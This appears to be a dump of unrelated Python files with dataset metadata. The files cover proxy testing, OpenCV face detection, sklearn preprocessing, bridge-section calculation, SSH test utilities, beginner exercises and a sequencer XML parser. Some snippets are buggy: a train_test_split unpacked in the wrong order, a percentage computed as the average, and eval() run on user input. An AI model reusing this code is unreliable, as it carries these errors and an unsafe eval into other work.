get_new = _init_proxies(FILENAME)
while True:
try:
proxy = get_new()
if proxy == None:
print("no more proxies left")
break
except Exception as e:
print("hideme error", e)
sys.exit(0)
if test_proxy(proxy, 3):
with open("working_hideme.txt", "a") as file:
file.write(proxy + "\n")
| true |
9bf874b452733c72a3b64749ac8ab382d36d2a38 | Python | FrankieZhen/Lookoop | /Image/OpenCV/Chapter5-笔记.py | UTF-8 | 2,007 | 2.703125 | 3 | [] | no_license | # 2018-9-6
# OpenCV3 计算机视觉 Python语言实现
# Github : https://github.com/techfort/pycv
# 英文教程: https://docs.opencv.org/3.2.0/d6/d00/tutorial_py_root.html
# 中文翻译: https://www.cnblogs.com/Undo-self-blog/p/8423851.html
# opencv中文教程: https://www.kancloud.cn/aollo/aolloopencv/272892
# 第五章笔记
import numpy as np
import matplotlib.pyplot
import scipy.special
import os
import cv2
from scipy import ndimage
# import cv # 已经被遗弃
# 视频人脸识别
def detect():
face = cv2.CascadeClassifier("data/haarcascade_frontalface_default.xml")
eye = cv2.CascadeClassifier("data/haarcascade_eye.xml")
camera = cv2.VideoCapture(0) # 0表示使用第一个摄像头
while True:
ret, frame = camera.read() # ret:布尔值表示是否读取帧成功, frame为帧本身
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # 检测人脸需要基于灰度图像
faces = face.detectMultiScale(gray, 1.3, 5)
# faces = face.detectMultiScale(gray, scaleFactor, minNeighbors)
# scaleFactor: 每次迭代时图像的压缩率
# minNeighbors: 每个人脸矩形保留近似邻近数目的最小值
for x,y,w,h in faces:
img = cv2.rectangle(frame, (x,y), (x + w, y + h), (250, 0, 0), 2)
eye_area = gray[y : y + h, x : x + w]
eyes = eye.detectMultiScale(eye_area, 1.03, 5, 0, (40, 40))
# eye.detectMultiScale(eye_area, 1.03, 5, 0, (40, 40))中
# (40, 40)参数目的是为了消除假阳性(false positive)的影响, 将眼睛搜索的最小尺寸现实为40x40
for ex,ey,ew,eh in eyes:
cv2.rectangle(frame, (x + ex, y + ey),(x + ex + ew, y + ey + eh), (0, 255, 0), 2)
cv2.imshow("face", frame)
if cv2.waitKey(1000 // 12) & 0xff == ord("q"):
break
camera.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
detect()
# 人脸识别见 face_detect 文件夹
| true |
e8921d1f41753ee07242366aea5a1db4ac5ac5b4 | Python | anagharumade/ML-Projects | /Machine-Learning-with-Python-R/Data Preprocessing/Feature_Scaling.py | UTF-8 | 1,166 | 3.109375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 14 17:06:08 2017
@author: absol
"""
import pandas as pd
#importing dataset
data = pd.read_csv('data.csv')
#Splitting dataset into Dependent and independent variables
X = data.iloc[:, :-1].values
Y = data.iloc[:, 3].values
#Dealing with missing values
from sklearn.preprocessing import Imputer
imputer = Imputer(missing_values = 'NaN', axis = 0, strategy = 'mean')
imputer = imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
#Categorical variables
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder = LabelEncoder()
X[:, 0] = labelencoder.fit_transform(X[:, 0])
onehotencoder = OneHotEncoder(categorical_features = [0])
X = onehotencoder.fit_transform(X).toarray()
labelencoder = LabelEncoder()
Y = labelencoder.fit_transform(Y)
#Splitting into training and testing data
from sklearn.cross_validation import train_test_split
X_train, Y_train, X_test, Y_test = train_test_split(X, Y, test_size = 0.2)
#Feature Scaling
from sklearn.preprocessing import StandardScaler
scaler_X = StandardScaler()
X_train = scaler_X.fit_transform(X_train)
Y_train = scaler_X.transform(Y_train) | true |
5187abacea26139fe8f93da4576ade47cdca9917 | Python | devesh-bhushan/python-assignments | /assignment-1/Q-8 class_marks.py | UTF-8 | 656 | 3.828125 | 4 | [] | no_license | """
program to calculate average marks and pecentage
"""
sub_1 = eval(input("enter the marks obtained in subject 1"))
sub_2 = eval(input("enter the marks obtained in subject 2"))
sub_3 = eval(input("enter the marks obtained in subject 3"))
sub_4 = eval(input("enter the marks obtained in subject 4"))
sub_5 = eval(input("enter the marks obtained in subject 5"))
totMks = sub_1+sub_2+sub_3+sub_4+sub_5
avg = totMks/5 # calculating the average of marks
per = totMks/5 # calculating the percentage
print("total marks are", totMks)
print("average of marks is", avg)
print("percentage of marks is", per) | true |
6659c5be5ce014b9258020c4b7441e6c034f1b89 | Python | LauraSiobhan/beginning_python_jul2021 | /exercise_13_1.py | UTF-8 | 433 | 4 | 4 | [] | no_license | my_string = 'hello world'
# print out "hello"
print(my_string[:5])
# print out "world"
print(my_string[6:])
# print it backwards
print(my_string[::-1])
my_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']
my_slice = my_list[2:7]
print(my_slice)
new_list = my_list
new_list[3] = 'z'
print(my_list)
my_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']
new_list = my_list[:]
new_list[3] = 'z'
print(my_list)
print(new_list)
| true |
55c39385ada91f723982c0e62433f23fe3dc0b1b | Python | Woodman5/ncc_calc | /src/stuff/count_sections.py | UTF-8 | 9,197 | 2.96875 | 3 | [
"MIT"
] | permissive | import pprint
import re
regex = r"[^\d-]+"
pp = pprint.PrettyPrinter(width=38, compact=True)
blength = int(input('Длина моста в мм: '))
gap_qty = int(input('Количество деформационных швов: '))
print('Укажите ширину деформационных швов слева направо через пробел.\nЕсли все одинаковые, укажите ширину 1 раз.')
while True:
text = input('Ширина, мм: ')
text = (re.sub(regex, ' ', text)).strip()
if text:
gap_wdth = [int(x) for x in text.split(' ') if int(x) > 0]
if len(text.split(' ')) == 1:
gap_wdth = [gap_wdth[0]] * gap_qty
break
if len(gap_wdth) != gap_qty:
print(f'Количество размеров в {gap_wdth} не совпадает с количеством швов.\nВведите данные еще раз.')
continue
break
before_gap_l = int(input('Отступ от стоек до швов слева в мм (стандартно 250 мм): '))
before_gap_r = int(input('Отступ от стоек до швов справа в мм (стандартно 250 мм): '))
while True:
text = input('Эти размеры фиксированы и не могут быть измененны? y/n ')
if text == 'y':
bgl_fix = True
break
elif text == 'n':
bgl_fix = False
break
continue
pillar_dist = int(input('Расстояние между опорами в регулярной секции в мм (стандартно 1500 мм): '))
overhang_end_l = int(input('Свес концевой левой секции в мм (стандартно 252 мм): '))
overhang_end_r = int(input('Свес концевой правой секции в мм(стандартно 252 мм): '))
print('Укажите длины участков моста до и между дефшвами слева направо')
lenth_list = []
for i in range(gap_qty + 1):
len4 = blength - sum(lenth_list) - sum(gap_wdth[:i])
if i < gap_qty:
while True:
len1 = int(input(f'Длина участка {i + 1} в мм: '))
len2 = overhang_end_l + before_gap_l
len3 = overhang_end_r + before_gap_r
if i == 0 and len1 < len2 or i == gap_qty and len4 < len3:
print('Первый или последний участок не может быть короче суммы длин отступа и свеса')
continue
lenth_list.append(len1)
break
print(f'До правого конца моста осталось {len4} мм')
continue
print(f'Последний участок длиной {len4} мм добавлен автоматически')
lenth_list.append(len4)
pp.pprint(lenth_list)
bridge = []
for i, value in enumerate(lenth_list):
if i == 0:
reg_qty, irreg_len = divmod(value - overhang_end_l - before_gap_l, pillar_dist)
print(f'Участок моста 1: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
if irreg_len < 500:
before_gap_l_temp = before_gap_l
if bgl_fix:
overhang_end_l += irreg_len
else:
x = irreg_len // 2
overhang_end_l += x
before_gap_l_temp += irreg_len - x
bridge.append(('L_end_1pillow_gap_section', 1, 0, overhang_end_l, before_gap_l_temp))
if irreg_len >= 500:
bridge.append(('L_end_2pillows_gap_section', 1, irreg_len, overhang_end_l, before_gap_l))
if reg_qty == 1:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('L_end_section', 1, pillar_dist1, overhang_end_l, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
if reg_qty - 2 == 0:
bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
else:
bridge.append(('Reg_section', reg_qty - 2, pillar_dist, 0, 0))
bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('L_end_section', 1, pillar_dist, overhang_end_l, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
elif i == len(lenth_list) - 1:
reg_qty, irreg_len = divmod(value - overhang_end_r - before_gap_r, pillar_dist)
print(f'Последний участок моста: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
if irreg_len < 500:
before_gap_r_temp = before_gap_r
if bgl_fix:
overhang_end_r += irreg_len
else:
x = irreg_len // 2
overhang_end_r += x
before_gap_r_temp += irreg_len - x
bridge.append(('R_end_1pillow_gap_section', 1, 0, before_gap_r_temp, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_end_2pillows_gap_section', 1, irreg_len, before_gap_r, overhang_end_r))
if reg_qty == 1:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('R_end_section', 1, pillar_dist2, 0, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, irreg_len, before_gap_r, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
if reg_qty - 2 == 0:
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('Ireg_section', 1, pillar_dist2, 0, 0))
else:
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
bridge.append(('Ireg_section', 1, pillar_dist2, 0, 0))
bridge.append(('Reg_section', reg_qty - 2, pillar_dist, 0, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, irreg_len, before_gap_r, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('R_end_section', 1, pillar_dist, 0, overhang_end_r))
else:
reg_qty, irreg_len = divmod(value - before_gap_r - before_gap_l, pillar_dist)
print(f'Участок моста {i + 1}: кол-во регулярных - {reg_qty}, остаток - {irreg_len}')
if reg_qty == 0:
pass
if reg_qty == 1:
pass
if reg_qty >= 2:
if irreg_len < 500:
pillar_dist1 = (pillar_dist + irreg_len) // 2
pillar_dist2 = pillar_dist + irreg_len - pillar_dist1
bridge.append(('R_gap_section', 1, pillar_dist1, before_gap_r, 0))
# if reg_qty - 2 == 0:
# bridge.append(('Ireg_section', 1, pillar_dist1, 0, 0))
# bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
# else:
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, pillar_dist2, 0, before_gap_l))
if irreg_len >= 500:
bridge.append(('R_gap_section', 1, pillar_dist, before_gap_r, 0))
bridge.append(('Reg_section', reg_qty - 1, pillar_dist, 0, 0))
bridge.append(('L_gap_section', 1, irreg_len, 0, before_gap_l))
print('\nРезультат:\nНазвание секции | количество | длина между опор | вылет слева | вылет справа')
pp.pprint(bridge)
| true |
e0dc0f048626a027db37f22d610536fd6a720e7b | Python | jaspalsingh92/TestAutomation-1 | /framework/Shared/css_utils.py | UTF-8 | 7,611 | 2.9375 | 3 | [] | no_license | # css_utils.py
import re
import logging
from Utils.ssh_util import SshUtil
logger = logging.getLogger('framework')
test_logger = logging.getLogger('test')
###### CSS Utilities ######
def log_assert(test, error):
"""
If test is false, write error message to log and assert.
:param test: Some sort of test
:param error: Error message to show if test is false
"""
if not test:
logger.info("ASSERT %s" % error)
test_logger.info("ASSERT %s" % error)
assert test, error
def log_ok_or_assert(test, ok, error):
"""
If test is true, write OK message to log. Otherwise, write error
message to log and assert.
:param test: Some sort of test
:param ok: OK message to show if test is true
:param error: Error message to show if test is false
"""
if test:
logger.info(ok)
test_logger.info(ok)
else:
logger.info("ASSERT %s" % error)
test_logger.info("ASSERT %s" % error)
assert test, error
def get_version(content):
"""
Get the version number from the content.
:param content: Content
:return: Version string if found, None otherwise.
"""
x = re.search(r"\b(\d\.\d.\d-\d\d\d)\b", content)
if x:
version = x.group(1)
logger.debug("version = %s" % version)
return version
else:
return None
def get_basename(cmd):
"""
Get the basename of a command.
:param content: Content
:return: The basename of the command
"""
basename = cmd.rsplit(" ", 1)[-1]
basename = basename.rsplit("/", 1)[-1]
return basename
def check_substring(content, substring, ignorecase=False):
"""
Check if the substring exist in the content.
:param content: The content to be checked
:param substring: Substring
:param ignorecase: Specify whether the checking should ignore case
:return: True if all substrings are in the content
"""
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
x = re.search(re.escape(substring), content, flags)
return x
def check_keyword(content, keyword, ignorecase=False):
"""
Check if the keyword exist in the content.
:param content: The content to be checked
:param keyword: Keyword
:param ignorecase: Specify whether the checking should ignore case
:return: True if line is found
"""
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
x = re.search(r"\b" + re.escape(keyword) + r"\b", content, flags)
return x
def check_line(content, line, ignorecase=False):
"""
Check if all substrings exist in the content.
:param content: The content to be checked
:param line: Line
:param ignorecase: Specify whether the checking should ignore case
:return: True if line is found
"""
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
x = re.search(r"^" + re.escape(line) + r"$", content, flags)
return x
def check_substrings(content, substrings, ignorecase=False):
"""
Check if all substrings exist in the content.
:param content: The content to be checked
:param substrings: Substrings
:param ignorecase: Specify whether the checking should ignore case
:return: True if all substrings are in the content
"""
found_all = True
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
for substring in substrings:
x = re.search(re.escape(substring), content, flags)
if not x:
found_all = False
break
return found_all
def check_no_substrings(content, keywords, ignorecase=False):
"""
Check if all substrings do not exist in the content.
:param content: The content to be checked
:param keywords: Keywords
:param ignorecase: Specify whether the checking should ignore case
:return: True if all keywords are in the content
"""
found_any = False
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
for keyword in keywords:
x = re.search(re.escape(keyword), content, flags)
if x:
found_any = True
break
return not found_any
def check_keywords(content, keywords, ignorecase=False):
"""
Check if all keywords exist in the content.
:param content: The content to be checked
:param keywords: Keywords
:param ignorecase: Specify whether the checking should ignore case
:return: True if all keywords are in the content
"""
found_all = True
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
for keyword in keywords:
logger.debug(f"checking {keyword}")
x = re.search(r"\b" + re.escape(keyword) + r"\b", content, flags)
if not x:
found_all = False
break
return found_all
def check_no_keywords(content, keywords, ignorecase=False):
"""
Check if all keywords do not exist in the content.
:param content: The content to be checked
:param keywords: Keywords
:param ignorecase: Specify whether the checking should ignore case
:return: True if all keywords are in the content
"""
found_any = False
flags = re.MULTILINE
if ignorecase:
flags |= re.IGNORECASE
for keyword in keywords:
x = re.search(r"\b" + re.escape(keyword) + r"\b", content, flags)
if x:
found_any = True
break
return not found_any
def check_man_page_or_assert(cmd, ssh):
basename = get_basename(cmd)
rc, result, error = ssh.send_command(f"man {cmd}")
# If no man page, we will get "No manual" error.
# In short, we should not get any error at all.
#In Solaris system in error some output is comming
#Need to verify using rc == 0 ,as rc is not equal to 0 then "No manual" page in error
assert rc == 0 ,f"No man page for '{cmd}': {result}"
def check_help_page_or_assert(cmd, helpopt, ssh):
basename = get_basename(cmd)
keywords = ["usage", basename]
logger.debug(basename)
rc, result, error = ssh.send_command(f"{cmd} {helpopt}")
content = ssh.to_string(result)
logger.debug(content)
log_ok_or_assert(check_keywords(content, keywords, True),
f"'{cmd} {helpopt}' shows help page",
f"'{cmd} {helpopt}' does not show help page")
def check_version_or_assert(cmd, veropt, dcver, ssh):
basename = get_basename(cmd)
rc, result, error = ssh.send_command(f"{cmd} {veropt}")
content = ssh.to_string(result)
logger.debug(content)
version = get_version(content)
log_ok_or_assert(version == dcver,
f"'{cmd} {veropt}' shows correct version {version}",
f"'{cmd} {veropt}' shows incorrect version {version}, "
f"the expected version is '{dcver}'")
class UserUnixProfile():
def __init__(self):
self.username = ''
self.password = ''
self.uid = ''
self.gid = ''
self.gecos = ''
self.home_dir = ''
self.shell = ''
def load_str(self, s):
try:
self.username, self.password, self.uid, self.gid, self.gecos, self.home_dir, self.shell = s.split(':')
except Exception:
raise ValueError(f'Failed to split and load passwd string: "{s}"')
def __repr__(self):
return ':'.join([
self.username,
self.password,
self.uid,
self.gid,
self.gecos,
self.home_dir,
self.shell,
])
| true |
97d0d2120b76fc91f4dc0124e7608ba070b85076 | Python | AdamC66/01---Reinforcing-Exercises-Programming-Fundamentals | /fundamentals.py | UTF-8 | 1,377 | 4.625 | 5 | [] | no_license | import random
# from random import randrange
# Exercise 1
# Create an emotions dict, where the keys are the names of different human emotions and the values are the degree to which the emotion is being felt on a scale from 1 to 3.
# Exercise 2
# Write a Person class with the following characteristics:
# name (string)
# emotions (dict)
# Initialize an instance of Person using your emotions dict from exercise 1.
# Exercise 3
# Add an instance method to your class that displays a message describing how the person is feeling. Substitute
# the words "high", "medium", and "low" for the emotion levels 1, 2, and 3.
emotions={
'happy':[1,2,3],
'sad':[1,2,3],
'angry':[1,2,3],
'elated':[1,2,3],
'malaise':[1,2,3],
'depressed':[1,2,3],
'upset':[1,2,3],
'excited':[1,2,3]
}
class Person:
def __init__(self,name, emotion):
self.name = name
self.emotion = emotion
def message(self):
return(f'{self.name} is feeling {self.emotion_level()} {self.rand_emotion()} today')
def emotion_level(self):
x = random.randrange(3)
if x == 0:
return "a little"
elif x==1:
return "somewhat"
elif x==2:
return "very"
def rand_emotion(self):
return(random.choice(list(self.emotion.keys())))
adam = Person('Adam', emotions)
print(adam.message()) | true |
a053e676c5adf5e03eb158e30b088f0cf6b64cc6 | Python | roman-4erkasov/coursera-data-structures-algorithms | /prj01_algorithmic_toolbox/week03wrk02_max_loot.py | UTF-8 | 1,829 | 4.3125 | 4 | [] | no_license | # Uses python3
"""
Task. The goal of this code problem is to implement an algorithm for the fractional knapsack problem.
Input Format. The first line of the input contains the number 𝑛 of items and the capacity 𝑊 of a knapsack. The next 𝑛 lines define the values and weights of the items. The 𝑖-th line contains integers 𝑣𝑖 and 𝑤𝑖—the value and the weight of 𝑖-th item, respectively.
Constraints. 1≤𝑛≤103,0≤𝑊 ≤2·106;0≤𝑣𝑖 ≤2·106,0<𝑤𝑖 ≤2·106 forall1≤𝑖≤𝑛.Allthe numbers are integers.
Output Format. Output the maximal value of fractions of items that fit into the knapsack. The absolute value of the difference between the answer of your program and the optimal value should be at most 10−3. To ensure this, output your answer with at least four digits after the decimal point (otherwise your answer, while being computed correctly, can turn out to be wrong because of rounding issues).
Sample 1.
Input:
> 3 50
> 60 20
> 100 50
> 120 30
Output:
> 180.0000
To achieve the value 180, we take the first item and the third item into the bag.
Sample 2.
Input:
1 10
500 30
Output:
> 166.6667
Here, we just take one third of the only available item.
"""
def max_value(items:list, W):
items.sort(key=lambda x: x[0], reverse=True)
value = 0
for sgfce, w, v in items:
if W == 0:
break
elif w < W:
value += v
W -= w
else:
value += W * sgfce
W = 0
return value
inp = list(input().split())
assert len(inp) == 2
N = int(inp[0])
W = float(inp[1])
items = []
for _ in range(N):
inp = list(input().split())
v = float(inp[0]) # value
w = float(inp[1]) # weight
sgfce = v / w # significance
items.append((sgfce, w, v))
print(max_value(items, W))
| true |
b66f42fb3a613b8789654642e59884921f6d608e | Python | lsst-camera-dh/pybench-ccd-reb | /camera/generic/rebxml.py | UTF-8 | 14,449 | 2.609375 | 3 | [] | no_license | #! /usr/bin/env python
#
# LSST
# Python minimal interface for the REB FPGA
# XML IO
#
from lxml import etree
from fpga import *
class XMLParser(object):
def __init__(self):
self.channels_desc = {}
self.channels = {}
self.parameters_desc = {}
self.parameters = {}
self.functions = {}
self.functions_desc = {}
self.subroutines = {}
self.subroutines_names = []
self.mains = {}
self.mains_names = []
self.unnamed_subroutine_num = 0
def process_number(self, s):
ss = s.strip()
if s == 'Inf':
return 'Inf'
try:
value = int(ss)
except ValueError:
value = float(ss)
return value
def process_value(self, s):
if not (isinstance(s, str)):
return s, None
ss = s.strip()
# replace by the parameter
# print ss
if self.parameters.has_key(ss):
lvalue = self.parameters[ss]
# print "K lvalue = ", lvalue
else:
lvalue = ss
# print "NK lvalue = ", lvalue
# process the unit
unit = None
if lvalue[-2:] == 'ns':
unit = 'ns'
lvaluenum = lvalue[:-2].strip()
elif lvalue[-2:] == 'us':
unit = 'us'
lvaluenum = lvalue[:-2].strip()
# elif lvalue[-1:] == 's':
# unit = 's'
# lvaluenum = lvalue[:-1].strip()
else:
lvaluenum = lvalue
# convert the numeral part
value = self.process_number(lvaluenum)
return value, unit
def parse_parameters(self, parameters_node):
params = parameters_node.xpath('parameter')
# print params
for param in params:
fullname = param.xpath('fullname/text()')[0]
name = param.get('id')
value = param.xpath('value/text()')[0]
param_dict = {'value': value}
if fullname != None:
param_dict['fullname'] = fullname
self.parameters_desc[name] = dict(param_dict)
self.parameters = \
dict([(k, self.parameters_desc[k]['value'])
for k in self.parameters_desc.keys()])
def parse_channels(self, channels_node):
cs = channels_node.xpath('channel')
# print cs
for c in cs:
fullname = c.xpath('fullname/text()')
name = c.get('id')
value = c.xpath('value/text()')[0]
c_dict = {'channel': int(value),
'name': str(name)}
if fullname != None:
c_dict['fullname'] = fullname[0]
self.channels_desc[name] = dict(c_dict)
self.channels = bidi.BidiMap([v['channel']
for v in self.channels_desc.values()],
[v['name']
for v in self.channels_desc.values()])
def parse_functions(self, functions_node):
funcs = functions_node.xpath('function')
# print funcs
idfunc = 0
for func in funcs:
fullname = func.xpath('fullname/text()')[0]
name = func.get('id')
func_dict = {}
func_dict['idfunc'] = idfunc
if fullname != None:
func_dict['fullname'] = fullname
self.functions_desc[name] = dict(func_dict)
print name, fullname
function = Function(name=name,
fullname=fullname,
channels=self.channels)
# analyzing constants
constants = {}
for const in func.xpath('constants/constant'):
# print const
channel = const.get('ref')
# print channel
# print const.xpath('text()')
value = int(const.xpath('text()')[0])
# print value
constants[channel] = value
# print constants
# analyzing slices
channel_position = {}
cpos = 0
for clock in func.xpath('clocklist/clock'):
# print clock
cname = clock.get('ref')
channel_position[cname] = cpos
cpos += 1
print channel_position
# self.timelengths = {0: 12, 1: 14}
# self.outputs = {0: '0b01001101...', 1: '0b1111000...', ... }
timelengths = {}
outputs = {}
islice = 0
for timeslice in func.xpath('slicelist/timeslice'):
slice_id = timeslice.get('id')
lduration = timeslice.xpath('duration/text()')[0]
duration, unit = self.process_value(lduration)
if unit == 'ns':
duration /= 10.0 # TODO: improve this
if unit == 'us':
duration *= 100.0
if islice == 0:
timelengths[islice] = int(duration) - 1 # FPGA adds one to duration of first slice
elif islice == len(func.xpath('slicelist/timeslice')) - 1:
timelengths[islice] = int(duration) - 2 # FPGA adds 2 to duration of last slice
else:
timelengths[islice] = int(duration)
output = 0x0000000000000000
svalue = timeslice.xpath('value/text()')[0].strip()
for ck, cdesc in self.channels_desc.iteritems():
cname = cdesc['name']
crank = cdesc['channel']
if constants.has_key(cname):
# that's a constant one
output |= (constants[cname] << crank)
elif channel_position.has_key(cname):
cpos = channel_position[cname]
cval = int(svalue[cpos])
output |= (cval << crank)
print bin(output)
outputs[islice] = output
islice += 1
function.timelengths = dict(timelengths)
function.outputs = dict(outputs)
self.functions_desc[name]['function'] = function
self.functions[name] = function
idfunc += 1
def parse_call(self, call_node):
"""
Parse (recursively) a simple <call> node.
Return an instruction; update the dictionary of subroutines
"""
# print " call"
repeat = 1
repeats = call_node.xpath('repeat/text()')
if (repeats != None) and (len(repeats) >= 1):
srepeat = repeats[0]
lvalue, lunit = self.process_value(srepeat)
repeat = lvalue
#print " repeat = ", repeat
if call_node.get('ref') != None:
#print " calling", call_node.get('ref')
called = str(call_node.get('ref')).strip()
# is it a 'function' call?
if self.functions_desc.has_key(called):
infinite_loop = False
if repeat == 'Inf':
infinite_loop = True
repeat = 1
instr = Instruction(opcode=Instruction.OP_CallFunction,
function_id=self.functions_desc[called]['idfunc'],
infinite_loop=infinite_loop,
repeat=repeat)
print instr
return instr
# else, is it a 'subroutine' call (jump)?
# do we check that the subroutine exists? even if defined later?
# elif subs.has_key(called):
else:
instr = Instruction(opcode=Instruction.OP_JumpToSubroutine,
subroutine=called,
infinite_loop=False,
repeat=repeat)
print instr
return instr
# else:
# # undefined call...
# raise ValueError("Call to undefined object '%s'" % called)
else: # unnamed subroutine
subcalls = call_node.xpath("call")
unnamed = Subroutine()
unnamed.name = "unnamed%04d" % self.unnamed_subroutine_num
self.unnamed_subroutine_num += 1
instr = Instruction(opcode=Instruction.OP_JumpToSubroutine,
subroutine=unnamed.name,
infinite_loop=False,
repeat=repeat)
print instr
print " unnamed subroutine", unnamed.name
for subcall in subcalls:
subinstr = self.parse_call(subcall)
unnamed.instructions.append(subinstr)
# Add the final RTS
unnamed.instructions.append(
Instruction(opcode=Instruction.OP_ReturnFromSubroutine))
self.subroutines[unnamed.name] = unnamed
self.subroutines_names.append(unnamed.name)
return instr
def parse_subroutine(self, sub_node):
# print "subroutine"
subname = sub_node.get('id')
fullname = sub_node.xpath('fullname/text()')[0]
print " name = ", subname
# print " fullname = ", fullname
sub = Subroutine()
sub.name = subname
sub.fullname = fullname
calls = sub_node.xpath('call')
for call_node in calls:
c_instr = self.parse_call(call_node)
sub.instructions.append(c_instr)
# Add the file RTS opcode at the end
sub.instructions.append(
Instruction(opcode=Instruction.OP_ReturnFromSubroutine))
return sub
def parse_subroutines(self, subroutines_node):
subs_nodes = subroutines_node.xpath('subroutine')
for sub_node in subs_nodes:
sub = self.parse_subroutine(sub_node)
self.subroutines[sub.name] = sub
self.subroutines_names.append(sub.name)
def parse_mains(self, mains_node):
mains_nodes = mains_node.xpath('main')
for main_node in mains_nodes:
main = self.parse_subroutine(main_node)
self.mains[main.name] = main
self.mains_names.append(main.name)
def parse_tree(self, tree_node):
self.unnamed_subroutine_num = 0
# Get the parameters
parameters_node = tree_node.xpath(
'/sequencer/sequencer-config/parameters')
# print parameters_node
parameters_node = parameters_node[0]
self.parse_parameters(parameters_node)
# parse the channel descriptions
channels_node = tree_node.xpath('/sequencer/sequencer-config/channels')
channels_node = channels_node[0]
self.parse_channels(channels_node)
# parse the sequencer functions
functions_node = tree_node.xpath(
'/sequencer/sequencer-config/functions')
functions_node = functions_node[0]
self.parse_functions(functions_node)
# Parse all subroutines
subroutines_node = tree_node.xpath(
'/sequencer/sequencer-routines/subroutines')
subroutines_node = subroutines_node[0]
self.parse_subroutines(subroutines_node)
print "SUBS", self.subroutines_names
# Parse all 'mains'
mains_node = tree_node.xpath('/sequencer/sequencer-routines/mains')
mains_node = mains_node[0]
self.parse_mains(mains_node)
print "MAINS", self.mains_names
# TODO: Modify for new sequencer: mains should now be written in memory as mains with END at the end,
# we will use 0x340000 to point to the right one.
allsubs = dict(self.mains)
allsubs.update(self.subroutines)
allsubsnames = self.mains_names + self.subroutines_names
# Produce a minimal main (a jump (JSR) and end-of-program (END))
# It points to the first 'main'.
supermain = [Instruction(opcode=Instruction.OP_JumpToSubroutine,
subroutine=self.mains_names[0]),
Instruction(opcode=Instruction.OP_EndOfProgram)]
# Create the unassembled program
self.prg = Program_UnAssembled()
self.prg.subroutines = allsubs # key = name, value = subroutine object
self.prg.subroutines_names = allsubsnames # to keep the order
self.prg.instructions = supermain # main program instruction list
return ( self.prg,
self.functions_desc,
self.parameters_desc,
self.channels_desc )
def parse_file(self, xmlfile):
tree = etree.parse(xmlfile)
return self.parse_tree(tree)
def validate_file(self, xmlfile):
"""
To implement. DTD/schema available???
"""
return True
# @classmethod
# def fromxmlfile(cls, xmlfile):
def fromxmlfile(xmlfile):
"""
Create and return a Sequencer instance from a XML file.
Raise an exception if the syntax is wrong.
"""
channels = {}
channels_desc = {}
functions = {}
functions_desc = {}
parameters = {}
parser = XMLParser()
( prg,
functions_desc,
parameters_desc,
channels_desc ) = parser.parse_file(xmlfile)
program = prg.compile()
channels = bidi.BidiMap([v['channel']
for v in channels_desc.values()],
[v['name']
for v in channels_desc.values()])
for k, v in functions_desc.iteritems():
functions[v['idfunc']] = v['function']
for k in parameters_desc:
parameter_string = parameters_desc[k]['value']
try:
parameters[k] = int(parameter_string)
except:
parameters[k] = parameter_string
seq = Sequencer(channels=channels,
channels_desc=channels_desc,
functions=functions,
functions_desc=functions_desc,
program=program,
parameters=parameters)
return seq
Sequencer.fromxmlfile = staticmethod(fromxmlfile)
# tree = etree.parse('sequencer-soi.xml')
# P = XMLParser()
# pr,fu = P.parse_file('sequencer-soi.xml')
| true |
472b233732864fef2bf95a94e3369c46d6efa08e | Python | mahikajain3/dlime_experiments | /explainer_base.py | UTF-8 | 5,650 | 2.640625 | 3 | [
"MIT"
] | permissive | import numpy as np
from boruta import BorutaPy
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import Ridge, lars_path
from sklearn.utils import check_random_state
class LimeBase(object):
def __init__(self,
